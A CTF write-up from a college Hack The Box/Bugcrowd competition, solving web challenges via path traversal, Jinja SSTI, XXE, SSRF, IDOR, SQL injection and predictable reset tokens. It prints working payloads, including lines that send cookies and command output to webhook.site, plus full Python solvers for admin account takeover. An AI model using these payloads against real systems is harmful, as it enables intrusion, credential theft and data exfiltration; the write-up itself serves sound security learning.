HackMD
Description
CTF Write-up for Bugcrowd College Rules CTF 2025
I participated in this CTF competition with Heroes Cyber Security (HCS), the cybersecurity community team from Institut Teknologi Sepuluh Nopember (ITS).
This write-up covers all Website Exploitation challenges. We managed to secure 1st place out of 64 teams.
Special thanks to @kiseki, and @rootkids, who participated with me.
Also, thanks to Bugcrowd and Hack The Box for organizing this event.
PathIntruder
Navigate through restricted areas by cleverly circumventing defenses. Can you find the path less traveled and expose the system's secrets? Note: Read /etc/passwd to get the flag
TL;DR
LFI with simple bypass sanitization.
Solve
We got a website like this.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
If you see the url, has the parameter lang to switch the website language that vulnerable to LFI.
But because they blacklist the ../, we could bypass it using ....//.
Which mean ../ on the center will be erased and the first .. and last / will be merge.
We make a request like this.
GET /?lang=....//....//etc/passwd HTTP/1.1
Host: 94.237.60.20:50785
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
And get the flag.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
HTB{lf1_1ntru51on_4t_1ts_f1n3st_f60187f119fc6d3cbcbc812c1eec2b3f}
Jinja Journals
Navigate through layers of code to unlock hidden potential. Do you have the skill to tweak the fabric of scripts and uncover secret messages? Gear up for a puzzle-packed adventure. Let the discovery begin!
TL;DR
Jinja SSTI.
Solve
Had a website like this.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
When we try to basic SSTI payload, we found it vulnerable.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Then we use this payload, to listing the directory.
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
And get the flag.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
HTB{r3nd3r_m3_vuln3r4bl3_d0a40d3fb5052f59bbbb34007f4821b6}
XXME
Engage in a high-stakes game of hidden information retrieval. Can you manipulate unseen mechanisms to unveil crucial data? The flag is located in /flag
TL;DR
XXE Injection.
Solve
Given a website like this.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Since the website is vulnerable to XXE, we try to add the payload like this.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
But we've got an error.
An error occurred: Unicode strings with encoding declaration are not supported. Please use bytes input or XML fragments without declaration.
To solve this, we just delete the <?xml version="1.0" encoding="UTF-8"?> on the start.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
HTB{XxE_c4n_b3_s0_p0w3rfuL_9c19b7088be16c5fffc558df4aceecc0}
BlindPDF
Welcome to BlindPDF, the exciting challenge where you turn your favorite HTML code into portable PDF documents! It's your chance to capture, share, and preserve the best of the internet with precision and creativity. Join us in transforming the way we save and cherish web content. NOTE: Leak /etc/passwd to get the flag!
TL;DR
SSRF using PDF (wkhtmltopdf).
Solve
We got a website, that like our html code will be converted to pdf.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
To solve this, we try to leak it with using fetch() but we got nothing on the pdf inside.
So we trying the another method since fetch() is asynchronous, we make a payload that synchronous.
<script>
x = new XMLHttpRequest();
x.open('GET', 'file:///etc/passwd', false); // Synchronous request
x.send();
document.write('<pre>' + x.responseText + '</pre>');
</script>
Download the PDF, and we got the flag.
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
HTB{PdF_g3n_w1th_LF1_sp1c3_e197f78260eb9c5008fe1ee33255dd7a}
MystiCart II
Search, reflect, and uncover: Can your keen eye reveal the secrets hidden in plain sight ?
TL;DR
Blind XSS.
Solve
We've got a website that vulnerable to HTML Injection, which is leading to XSS.
But, we don't see any bot that makes only self-xss and does not get the flag.
After exploring more, we found the product page has a report feature.
Then, we try to intercept it, likely this feature will be send on admin dashboard.
After that, we make a request like this to get the admin cookie.
GET /report?id=..%3Fsearch=<img+src=x+onerror='fetch(`//webhook.site/00f9272f-cf1f-4621-afeb-7bb009f5bc63?x=`%252Bdocument.cookie)'> HTTP/1.1
Host: 83.136.251.194:55172
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: */*
Referer: http://83.136.251.194:55172/product/2
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
We got the cookie.
Then decode the base64.
HTB{F1X_Y0Ur_x55_M4n_1t5_d4nger0us!_58ee44bb40fb7569dc08527f1092c3a8}
Rerouter
We've built the most secure cURL-based post-deploy healthcheck tool in the market, come and check it out!
Source : rerouter.zip
TL;DR
SSRF.
Solve
We had a website like this.
As you think this was vulnerable to SSRF, and we see the source code.
echo "fastcgi_param DB_CONNECTION mysql;\nfastcgi_param DB_HOST 127.0.0.1;\nfastcgi_param DB_PORT 3306;\nfastcgi_param DB_DATABASE hackthebox;\nfastcgi_param DB_USERNAME forge;\nfastcgi_param DB_PASSWORD '`cat /flag.txt`';" >> /etc/nginx/fastcgi_params
The DB_Password was replaced with the flag, then we could also read it through /phpinfo since the endpoint is exist on the source code.
http://localhost/phpinfo
HTB{SSrFs_4r3_fun!_f44f8b3d5018a3b0ad1d0526bae7853a}
CursePress
This CMS has been cursed, can you find the spell to lift the curse.
Source : cursepress.zip
TL;DR
CVE-2021-25003: Unauth RCE WPCargo.
Solve
As you see this theme is likely from WordPress.
We found on the entrypoint.sh, this website is installing a plugin which is vulnerable to unauth RCE.
wp plugin install wpcargo --version=6.8.0 --activate --path="/var/www/wordpress"
Also we got the existing exploit from the github
https://github.com/biulove0x/CVE-2021-25003
To solve it, we just change the command payload to reverse shell like this.
Then we got it.
HTB{th3_cms_th3_myth_th3_l3g3nd_28e40cb86ed64e61087a4a03516656ec}
MaxPass Manager
You've been tasked with a pentesting engagement on a password manager platform, they've provided you with a mockup build of the website and they've asked you to find a way to login as "admin".
Source : maxpass_manager.zip
TL;DR
IDOR.
Solve
Got a website like this.
If you see the source code, the flag is on the admin dashboard.
But we have to known to access admin dashboard, since the password get randomize as secret.
If you look more, at the source you will get this endpoint.
router.get('/api/passwords/:uuid', AuthMiddleware, async (req, res) => {
return db.getUser(req.data.username)
.then(user => {
if (user === undefined) return res.redirect('/');
if (req.params.uuid) {
return db.getSavedPasswords(req.params.uuid)
.then(passwords => {
if(passwords) return res.send({passwords});
res.status(404).send(response('user does not exist'));
})
}
return res.status(403).send(response('Missing parameters!'));
})
.catch(() => res.status(500).send(response('Something went wrong!')));
});
Since those endpoint does not get verification, which is has vulnerable to IDOR.
Then we create a request, that the endpoint id is targeted to admin account.
GET /api/passwords/73 HTTP/1.1
Host: 94.237.49.230:53769
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: */*
Referer: http://94.237.49.230:53769/dashboard
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImxvdWlzYmFybmV0dCIsImlhdCI6MTc0MzA3MDM3M30.KsxVezkAjqFw94PoPWm41AnwdElI2tfR5VRyxwNavyA
Connection: close
We got the admin password.
Logging in, and we got the flag.
HTB{ID0R_PWN4G3!!}
GalacticDB
The Galactic Federation's refugee database tracks beings seeking asylum across dimensions, but hidden within are the records of dangerous criminals posing as refugees. Your mission is to breach the database, uncover the identities of these criminals, and expose their crimes without alerting the authorities. Good luck!
Source : galacticdb.zip
TL;DR
RCE with PostgreSQL.
Solve
We got a website like this.
If we see the source code, this website using postgresql.
# create DB directories
mkdir -p /run/postgresql /var/lib/postgresql/data
chown -R postgres:postgres /run/postgresql /var/lib/postgresql/data
chmod 0700 /var/lib/postgresql/data
# Initialize PostgreSQL DB cluster
su postgres -c "initdb -D /var/lib/postgresql/data"
echo "host all all 0.0.0.0/0 md5" >> /var/lib/postgresql/data/pg_hba.conf
echo "listen_addresses='*'" >> /var/lib/postgresql/data/postgresql.conf
# Start PostgreSQL
su postgres -c 'pg_ctl start -D /var/lib/postgresql/data'
Then we look more on the routes, we known this parameter is vulnerable.
const express = require('express');
const router = express.Router({ caseSensitive: true });
let db;
router.get('/', (req, res) => {
const id = req.query.id;
if (id) {
return db.get_fugitive(id)
.then((data) => {
return res.render('index.html', { data: data });
})
.catch((e) => {
console.log(e)
res.send('Something Went Wrong!')
});
} else {
return db.get_all()
.then((data) => {
return res.render('index.html', { data: data });
})
.catch((e) => {
console.log(e);
})
}
});
module.exports = database => {
db = database;
return router;
};
We got a reference, which is how RCE could be executed from PostgreSQL query.
https://medium.com/r3d-buck3t/command-execution-with-postgresql-copy-command-a79aef9c2767
Then we make request for creating table.
GET /?id=1;CREATE+TABLE+gacor(output+text); HTTP/1.1
Host: 94.237.58.78:36771
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.58.78:36771/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
From the table we create, now time to read the flag file.
GET /?id=1;COPY+gacor+FROM+PROGRAM+'curl+https://webhook.site/8e2cc101-bf23-4d0d-aa93-4d146dee1682+-d+`/readflag`'; HTTP/1.1
Host: 94.237.58.78:36771
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.58.78:36771/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
And we got the flag.
HTB{P0sGr3SQL_15_vuLn3abl3_t0_Rc3_m4N_1ts_fun!!_1bed389c4aee55ae69c5784d0cba5f05}
Predictable
You've been tasked on a pentest engagement to understand the token generation process and exploit it, do you have what it takes?
Source : predictable.zip
TL;DR
Bruteforce token leading to admin account takeover.
Solve
We had website like this.
If we look on the source code at the line 10 and 11 , the function for generate token is likely predictable.
async function generateOrResend(email, isAdmin) {
let db = await getDb();
const currentTime = Date.now();
const tokenExists = await db.checkResetTokenExists(email);
if (tokenExists && currentTime < tokenExists.nextAllowedSendTime) {
return { success: false, message: 'Please wait before requesting a new token.' };
}
const seed = email + currentTime.toString();
const token = crypto.createHash('md5').update(seed).digest('hex');
const expiration = currentTime + 3600000;
const nextAllowedSendTime = currentTime + 10000;
const addTokenSuccess = await db.addResetToken(email, token, expiration, nextAllowedSendTime);
if (!addTokenSuccess) {
return { success: false, message: 'Failed to store the reset token.' };
}
if (!isAdmin) {
const emailResponse = await EmailHelper.sendEmail(email, token);
if (!emailResponse.success) {
return { success: false, message: 'Failed to send email.' };
}
return { success: true, message: 'Reset token generated and email is sent.', iframe: emailResponse.response };
} else {
return { success: true, message: 'Reset token generated but not sent for admin email.' };
}
}
Also, to get the flag we must logged in as admin.
router.get('/dashboard', async (req, res) => {
if (!req.session.user) {
return res.redirect('/login');
}
let db = await getDb();
try {
const isAdmin = await db.isAdmin(req.session.user);
const flagMessage = isAdmin ? fs.readFileSync('/flag') : '🚨 Log in as admin@hackthebox.com to see the flag here 🚨';
res.render('dashboard', {
user: req.session.user,
flagMessage: flagMessage
});
} catch (error) {
console.error('Dashboard error:', error);
res.status(500).send('An error occurred.');
}
});
We creating solver, to bruteforce token like this.
import hashlib
import time
import requests
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
import sys
# --- Configuration ---
TARGET_URL = 'http://94.237.48.197:57992/api/forgot-password'
RESET_PASSWORD_URL = 'http://94.237.48.197:57992/api/reset-password'
TARGET_EMAIL = "admin@hackthebox.com"
NEW_PASSWORD = "admin123"
SEARCH_WINDOW_MS_BEFORE = 2000 # Milliseconds before estimated timestamp
SEARCH_WINDOW_MS_AFTER = 10000 # Milliseconds after estimated timestamp
MAX_THREADS = 50 # Number of concurrent threads for token testing
# --------------------
def trigger_forgot_password_and_estimate_time():
payload = {"email": TARGET_EMAIL}
client_request_start_time = int(time.time() * 1000)
print(f"[+] Sending POST request to {TARGET_URL} for email {TARGET_EMAIL}...")
print(f" -> Client start time: {client_request_start_time} ({datetime.utcfromtimestamp(client_request_start_time / 1000).isoformat()})")
try:
response = requests.post(
TARGET_URL,
json=payload,
headers={
"Content-Type": "application/json",
"Accept": "application/json, text/plain, */*"
}
)
client_response_received_time = int(time.time() * 1000)
request_duration = client_response_received_time - client_request_start_time
print(f"[+] Response received. Status: {response.status_code}. Request duration: {request_duration}ms")
print(f" -> Client response time: {client_response_received_time} ({datetime.utcfromtimestamp(client_response_received_time / 1000).isoformat()})")
response_body_text = response.text
if not response.ok:
print(f"[-] HTTP error! Status: {response.status_code} {response.reason}.")
print(f"[-] Response Body: {response_body_text}")
return client_response_received_time
print("[+] Request successful (received OK status).")
estimated_server_time = client_response_received_time - 100
print(f"[+] Estimated server processing timestamp (approx): {estimated_server_time} ({datetime.utcfromtimestamp(estimated_server_time / 1000).isoformat()})")
return estimated_server_time
except Exception as e:
client_error_time = int(time.time() * 1000)
print(f"[-] Network or fetch error after {client_error_time - client_request_start_time}ms: {str(e)}")
return None
def guess_tokens(email, estimated_timestamp, window_before, window_after):
if estimated_timestamp is None or not isinstance(estimated_timestamp, int):
print("[-] Invalid estimated timestamp provided. Cannot guess tokens.")
return []
start_time = estimated_timestamp - window_before
end_time = estimated_timestamp + window_after
potential_tokens = []
print(f"[+] Guessing tokens for email {email}")
print(f"[+] Searching timestamp range: {start_time} to {end_time}")
print(f" -> From: {datetime.utcfromtimestamp(start_time / 1000).isoformat()}")
print(f" -> To: {datetime.utcfromtimestamp(end_time / 1000).isoformat()}")
total_guesses = end_time - start_time + 1
print(f"[+] Total potential tokens to generate: {total_guesses}")
for ts in range(start_time, end_time + 1):
seed = email + str(ts)
token = hashlib.md5(seed.encode()).hexdigest()
potential_tokens.append(token)
print(f"[+] Generated {len(potential_tokens)} potential tokens.")
return potential_tokens
def test_token(token):
payload = {
"email": TARGET_EMAIL,
"token": token,
"newPassword": NEW_PASSWORD
}
try:
response = requests.post(
RESET_PASSWORD_URL,
json=payload,
headers={
"Content-Type": "application/json",
"Accept": "application/json, text/plain, */*"
}
)
if response.ok:
response_data = response.json()
if response_data.get("success", False):
print(f"[SUCCESS] Valid token found: {token}")
print(f"Server response: {response_data}")
return True
print(f"[-] Invalid token: {token}")
return False
except Exception as e:
print(f"[-] Error testing token {token}: {str(e)}")
return False
def test_tokens(tokens):
print("\n[+] Testing tokens against the reset password endpoint using multithreading...")
with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
futures = {executor.submit(test_token, token): token for token in tokens}
for future in as_completed(futures):
if future.result():
print("[+] Password reset successful!")
sys.exit(0)
print("[-] No valid token found.")
return False
def run_exploit():
estimated_time = trigger_forgot_password_and_estimate_time()
if estimated_time is not None:
tokens = guess_tokens(TARGET_EMAIL, estimated_time, SEARCH_WINDOW_MS_BEFORE, SEARCH_WINDOW_MS_AFTER)
if tokens:
print("\n[+] Token generation complete.")
test_tokens(tokens)
else:
print("[-] No tokens were generated (check timestamp estimate and window).")
else:
print("[-] Failed to get an estimated time. Aborting token guessing.")
if __name__ == "__main__":
run_exploit()
Then we got it.
Login as admin.
HTB{pr3d1ct4bl3_s33ds_4r3_s0000_pr3d1ct4bl3!_f6b819b0fbeb7b705a443ee747d4a0bd}
Private Portal 2
Can you hack into this private portal and access the secret data twice?
Source private_portal.zip
TL;DR
SQL Injection.
Solve
Got website like this.
We look into source code, the flag is only can be access with admin account.
def index():
if not session.get("loggedin"):
return redirect("/login")
user_id = request.args.get("id")
if not user_id:
return "Missing parameters", 400
db = Database()
user_data = db.get_user_data(user_id)
user_details = db.get_user_details(user_id)
if user_id != session.get("user_id"):
return "Bad request", 400
flag = open("/flag.txt", "r").read()
return render_template("home.html", user_data=user_data, user_details=user_details, flag=flag)
Then this endpoint was vulnerable to SQLi.
def get_user_data(self, user_id):
user = self.query(f"SELECT * FROM user_data WHERE id = '{user_id}'", multi=True)
return user[0][0]["data"]
Which is we need to register -> login -> then injecting the parameter to update admin account password with this payload.
{id_user}'; UPDATE users SET password = '{our_password_hash}' WHERE username = 'administrator'; -- "
So we create the solver like this.
import requests
import bcrypt
import re
new_password = "admin123"
new_password_bytes = new_password.encode("utf-8")
salt = bcrypt.gensalt()
new_password_hash = bcrypt.hashpw(new_password_bytes, salt).decode()
hardcoded_username = "user123"
hardcoded_password = "password123"
print(f"[+] Registering hardcoded user: {hardcoded_username}")
register_url = "http://83.136.249.101:51869/register"
register_data = {
"username": hardcoded_username,
"password": hardcoded_password
}
register_response = requests.post(register_url, data=register_data)
if register_response.status_code == 200:
print(f"[+] Successfully registered hardcoded user: {hardcoded_username}")
else:
print(f"[-] Failed to register hardcoded user. Assuming the user already exists.")
print(f"[+] Logging in as {hardcoded_username}...")
login_url = "http://83.136.249.101:51869/login"
login_data = {
"username": hardcoded_username,
"password": hardcoded_password
}
session = requests.Session()
login_response = session.post(login_url, data=login_data, allow_redirects=False)
if login_response.status_code == 302:
print("[+] 302 Redirect detected:")
relative_redirect_url = login_response.headers.get('Location')
print(f"[+] Relative redirect URL: {relative_redirect_url}")
base_url = "http://83.136.249.101:51869"
absolute_redirect_url = base_url + relative_redirect_url
print(f"[+] Absolute redirect URL: {absolute_redirect_url}")
redirect_response = session.get(absolute_redirect_url)
match = re.search(r'id=(\d+)', relative_redirect_url)
if match:
extracted_id = match.group(1)
print(f"[+] Extracted ID from redirect URL: {extracted_id}")
else:
print("[-] Failed to extract ID from redirect URL.")
exit()
if "Welcome back" in redirect_response.text:
print(f"[+] Successfully logged in as {hardcoded_username}")
else:
print(f"[-] Login response after redirect: {redirect_response.text}")
print("[-] Login failed. Exiting...")
exit()
else:
print(f"[-] Unexpected login response: {login_response.status_code}")
print(f"[-] Response body: {login_response.text}")
print("[-] Login failed. Exiting...")
exit()
malicious_payload = f"{extracted_id}'; UPDATE users SET password = '{new_password_hash}' WHERE username = 'administrator'; -- "
encoded_payload = requests.utils.quote(malicious_payload)
absolute_url = "http://83.136.249.101:51869/?id="
exploit_url = session.get(absolute_url + encoded_payload)
print("[+] Attempting to log in as administrator with the new password...")
admin_login_url = "http://83.136.249.101:51869/login"
admin_login_data = {
"username": "administrator",
"password": new_password
}
admin_session = requests.Session()
admin_login_response = admin_session.post(admin_login_url, data=admin_login_data)
if "Welcome back" in admin_login_response.text:
print("[+] Exploit successful! Successfully logged in as administrator with the new password.")
cleaned_response = admin_login_response.text.replace("\n", "").replace("\r", "").strip()
flag_match = re.search(r'HTB\{.*?\}', cleaned_response)
if flag_match:
print(f"[+] Flag found: {flag_match.group(0)}")
else:
print("[-] Flag not found in the response.")
else:
print("[-] Exploit likely failed. Could not log in as administrator with the new password.")
# print(f"[-] Admin login response: {admin_login_response.text}")
# print(f"[-] Exploit Response Status: {exploit_url.status_code}")
# print(f"[-] Exploit Response Content: {exploit_url.text}")
# print(f"[-] Payload: {encoded_payload}")
Then we got the flag.
HTB{y0u_sur3_th4t5_p4tched_bud?_c4a8e518166b764fb4a233e63acf3538}
